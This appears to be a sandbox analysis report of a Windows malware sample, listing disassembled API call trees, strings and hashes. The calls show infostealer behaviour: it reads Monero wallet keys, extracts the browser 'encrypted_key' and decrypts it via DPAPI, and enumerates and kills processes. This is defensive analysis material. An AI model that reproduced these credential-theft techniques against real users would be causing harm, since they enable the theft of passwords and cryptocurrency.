                                        • Part of subcall function 00F1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F1A13C
                                        • Part of subcall function 00F1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F1A161
                                        • Part of subcall function 00F1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F1A181
                                        • Part of subcall function 00F1A110: ReadFile.KERNEL32(000000FF,?,00000000,00F1148F,00000000), ref: 00F1A1AA
                                        • Part of subcall function 00F1A110: LocalFree.KERNEL32(00F1148F), ref: 00F1A1E0
                                        • Part of subcall function 00F1A110: CloseHandle.KERNEL32(000000FF), ref: 00F1A1EA
                                        • Part of subcall function 00F28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F28FE2
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00F31678,00F30D93), ref: 00F1F64C
                                      • lstrlen.KERNEL32(00000000), ref: 00F1F66B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      • Opcode ID: bad20134cfc73e7b9a500b227c26d9ec1c2291029c830ef9a9bb62376de3ce7f
                                      • Instruction ID: 60b4be3ca25fce1d9c2b806b8d1f2cc9a6d793871a98ed723db171a59985ac59
                                      • Opcode Fuzzy Hash: bad20134cfc73e7b9a500b227c26d9ec1c2291029c830ef9a9bb62376de3ce7f
                                      • Instruction Fuzzy Hash: 9C51F171D101189BCB04FBE4ED66DED7379BF94304F408568F91667191EE386A08DB62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen
                                      • String ID:
                                      • API String ID: 367037083-0
                                      • Opcode ID: c774b1bfdcad5ba213c00905da51ae2c12d26ff61d5e1ff6660d84a1c73c24e5
                                      • Instruction ID: 16ab81d14329caf7bd3c96ad98e8b482790f5ae270295aaecca369031d401cf2
                                      • Opcode Fuzzy Hash: c774b1bfdcad5ba213c00905da51ae2c12d26ff61d5e1ff6660d84a1c73c24e5
                                      • Instruction Fuzzy Hash: B24130B1D001199BDB04EFE4EC55AEEB779AF44314F008019F5167B280EB78AA45EFA2
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F1A13C
                                        • Part of subcall function 00F1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F1A161
                                        • Part of subcall function 00F1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F1A181
                                        • Part of subcall function 00F1A110: ReadFile.KERNEL32(000000FF,?,00000000,00F1148F,00000000), ref: 00F1A1AA
                                        • Part of subcall function 00F1A110: LocalFree.KERNEL32(00F1148F), ref: 00F1A1E0
                                        • Part of subcall function 00F1A110: CloseHandle.KERNEL32(000000FF), ref: 00F1A1EA
                                        • Part of subcall function 00F28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F28FE2
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F1A489
                                        • Part of subcall function 00F1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F14F3E,00000000,00000000), ref: 00F1A23F
                                        • Part of subcall function 00F1A210: LocalAlloc.KERNEL32(00000040,?,?,?,00F14F3E,00000000,?), ref: 00F1A251
                                        • Part of subcall function 00F1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F14F3E,00000000,00000000), ref: 00F1A27A
                                        • Part of subcall function 00F1A210: LocalFree.KERNEL32(?,?,?,?,00F14F3E,00000000,?), ref: 00F1A28F
                                        • Part of subcall function 00F1A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F1A2D4
                                        • Part of subcall function 00F1A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00F1A2F3
                                        • Part of subcall function 00F1A2B0: LocalFree.KERNEL32(?), ref: 00F1A323
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 2100535398-738592651
                                      • Opcode ID: 3f61e946e7f4bc5f68e3974d9015a837487b97a6d774de6d10beeae0d512ed9f
                                      • Instruction ID: 4bd50044ea5ebde9166ba73ce3044709683edf0a114652b31ac365402c83441a
                                      • Opcode Fuzzy Hash: 3f61e946e7f4bc5f68e3974d9015a837487b97a6d774de6d10beeae0d512ed9f
                                      • Instruction Fuzzy Hash: 99316FB6D11208ABCF04DFE4EC45AEFB3B9BF58344F444518E901A3241EB35DA44DBA2
                                      APIs
                                      • memset.MSVCRT ref: 00F2967B
                                        • Part of subcall function 00F28EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00F296AE,00000000), ref: 00F28EEB
                                        • Part of subcall function 00F28EE0: RtlAllocateHeap.NTDLL(00000000), ref: 00F28EF2
                                        • Part of subcall function 00F28EE0: wsprintfW.USER32 ref: 00F28F08
                                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00F2973B
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F29759
                                      • CloseHandle.KERNEL32(00000000), ref: 00F29766
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                      • String ID:
                                      • API String ID: 3729781310-0
                                      • Opcode ID: 53d393cc06cdc5a5f5692ad6569d95c1df7fbc1d6df9eecd542c1d3742a3a691
                                      • Instruction ID: 1d79fce179477a08a58c1ad78aef8c2e139cc0aeff79cdcb62077aedb0218efa
                                      • Opcode Fuzzy Hash: 53d393cc06cdc5a5f5692ad6569d95c1df7fbc1d6df9eecd542c1d3742a3a691
                                      • Instruction Fuzzy Hash: 35315E75E002189BDF14DFE0ED49BEDB7B9BB44700F104458F506AF188DBB89A84DB91
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00F305BF), ref: 00F2885A
                                      • Process32First.KERNEL32(?,00000128), ref: 00F2886E
                                      • Process32Next.KERNEL32(?,00000128), ref: 00F28883
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • CloseHandle.KERNEL32(?), ref: 00F288F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: 39d7d5a25c884ea18bcb679d34c6c788870db74990acee17555854221f6151c7
                                      • Instruction ID: a31d3fccc6e7f4eb0ae8ec965116f0bb0cc970a5b43715b5166198f0801bbd5f
                                      • Opcode Fuzzy Hash: 39d7d5a25c884ea18bcb679d34c6c788870db74990acee17555854221f6151c7
                                      • Instruction Fuzzy Hash: A9316B71901228ABCB24DF94EC51FEEB3B8FF44700F1045A9F10AA6190EB34AA44DFA1
                                      APIs
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F8FE13
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F8FE2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Value___vcrt_
                                      • String ID:
                                      • API String ID: 1426506684-0
                                      • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction ID: 89045ac30240127d22d86ed660ee710f5feaef9669309319ffa8d7384a0c573e
                                      • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction Fuzzy Hash: A9018432509726EEFE3436759CC9AAB3694FB017B57344339F116851F2EF564C45B240
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F30DE8,00000000,?), ref: 00F27B40
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F27B47
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00F30DE8,00000000,?), ref: 00F27B54
                                      • wsprintfA.USER32 ref: 00F27B83
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: e45da9ae76ed2bf0db27001a93027640aef836c39ba8d25b2303ddd4c8b1b563
                                      • Instruction ID: 8ed22c5836b10b7a3015c7a7c50678c1d0b2e289090c43d356a8e444dc512d98
                                      • Opcode Fuzzy Hash: e45da9ae76ed2bf0db27001a93027640aef836c39ba8d25b2303ddd4c8b1b563
                                      • Instruction Fuzzy Hash: 66112AB2904219ABDB18DBC9E945BBEBBF8EB4CB11F10411AF615A6284D2395980D7B0
                                      APIs
                                      • CreateFileA.KERNEL32(00F23D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00F23D3E,?), ref: 00F2948C
                                      • GetFileSizeEx.KERNEL32(000000FF,00F23D3E), ref: 00F294A9
                                      • CloseHandle.KERNEL32(000000FF), ref: 00F294B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID:
                                      • API String ID: 1378416451-0
                                      • Opcode ID: 07615811229a2140aa72aed2ab3ef00d779fdaec0024745e8830792f66c26c05
                                      • Instruction ID: d0e37c0c9c5f1d72a6c528099942c154ed340aabd2686750778439312f8f4ab5
                                      • Opcode Fuzzy Hash: 07615811229a2140aa72aed2ab3ef00d779fdaec0024745e8830792f66c26c05
                                      • Instruction Fuzzy Hash: 87F04439E04308BBDB24DFF0EC49F5E77BAAB48714F10C554FA11AB1C4D67096419B90
                                      APIs
                                      • __getptd.LIBCMT ref: 00F2CA7E
                                        • Part of subcall function 00F2C2A0: __amsg_exit.LIBCMT ref: 00F2C2B0
                                      • __getptd.LIBCMT ref: 00F2CA95
                                      • __amsg_exit.LIBCMT ref: 00F2CAA3
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00F2CAC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 300741435-0
                                      • Opcode ID: 8e0a58d4b45469e0c7938420302ca4f378266aa6abb52943b620d540acc73859
                                      • Instruction ID: abc78b01137080a79d486981080fee8d158b46b1e41b2d5a2105a35d7356ae37
                                      • Opcode Fuzzy Hash: 8e0a58d4b45469e0c7938420302ca4f378266aa6abb52943b620d540acc73859
                                      • Instruction Fuzzy Hash: 72F06D32944338DBD721FBA8BC1274E33A0AF00720F100149E805AB1D2CB2C5941BBD6
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Catch
                                      • String ID: MOC$RCC
                                      • API String ID: 78271584-2084237596
                                      • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction ID: 64c4249a4f102005289d36860de8948283fc2d00624280653f3431d19026882e
                                      • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction Fuzzy Hash: C1415972900209EFEF16DF98DD81AEEBBB5BF48314F198099F90466221D7359950EF50
                                      APIs
                                        • Part of subcall function 00F28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F28F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F251CA
                                      • lstrcat.KERNEL32(?,00F31058), ref: 00F251E7
                                      • lstrcat.KERNEL32(?,01D88F78), ref: 00F251FB
                                      • lstrcat.KERNEL32(?,00F3105C), ref: 00F2520D
                                        • Part of subcall function 00F24B60: wsprintfA.USER32 ref: 00F24B7C
                                        • Part of subcall function 00F24B60: FindFirstFileA.KERNEL32(?,?), ref: 00F24B93
                                        • Part of subcall function 00F24B60: StrCmpCA.SHLWAPI(?,00F30FC4), ref: 00F24BC1
                                        • Part of subcall function 00F24B60: StrCmpCA.SHLWAPI(?,00F30FC8), ref: 00F24BD7
                                        • Part of subcall function 00F24B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00F24DCD
                                        • Part of subcall function 00F24B60: FindClose.KERNEL32(000000FF), ref: 00F24DE2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: d6163158e0c3707a45f58f41806a59402de703f979f68164b4396861ba90bd83
                                      • Instruction ID: c278d9ff4aa02287202b8be3a314b4b84f164d72ab2f2d5fcaab3223a0d7ceb6
                                      • Opcode Fuzzy Hash: d6163158e0c3707a45f58f41806a59402de703f979f68164b4396861ba90bd83
                                      • Instruction Fuzzy Hash: 3921DDB6900218A7DB28F7F0EC52EED737CAB94300F404554F655961C5EF7896C8DB92